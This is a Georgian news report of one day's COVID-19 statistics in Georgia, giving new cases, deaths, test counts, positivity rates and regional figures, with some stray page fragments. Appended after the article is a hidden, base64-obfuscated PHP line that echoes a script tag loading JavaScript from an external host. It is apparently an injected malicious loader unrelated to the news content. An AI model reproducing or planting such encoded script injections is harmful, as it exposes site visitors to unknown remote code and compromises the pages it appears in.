celsiusi
ავერსი შნაიდერი
ბოლო 24 საათში საქართველოში კორონავირუსის 8 767 ახალი შემთხვევა დაფიქსირდა და 49 ადამიანი გარდაიცვალა.
 
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ჩატარდა 56 386 კვლევა ტესტით, მათ შორის 35 725 კვლევა ანტიგენის ტესტით და 20 661 — PCR ტესტით. დადებითობის დღიური მაჩვენებელი 15.55%, ბოლო 14 დღის განმავლობაში — 11.39% ხოლო 7 დღის მანძილზე — 12.76%.
 
პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 14 631 პირი ემსხვერპლა.
 
ინფიცირების 8 767 ახალი შემთხვევა რეგიონების მიხედვით შემდეგნაირად ნაწილდება:
 
თბილისი — 5 052 შემთხვევა,
აჭარა — 851,
იმერეთი — 861,
ქვემო ქართლი — 351,
შიდა ქართლი — 538,
გურია — 119,
სამეგრელო-ზემო სვანეთი — 334,
კახეთი — 277,
მცხეთა-მთიანეთი — 176,
სამცხე-ჯავახეთი — 165,
რაჭა-ლეჩხუმი და ქვემო სვანეთი — 43.
820
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");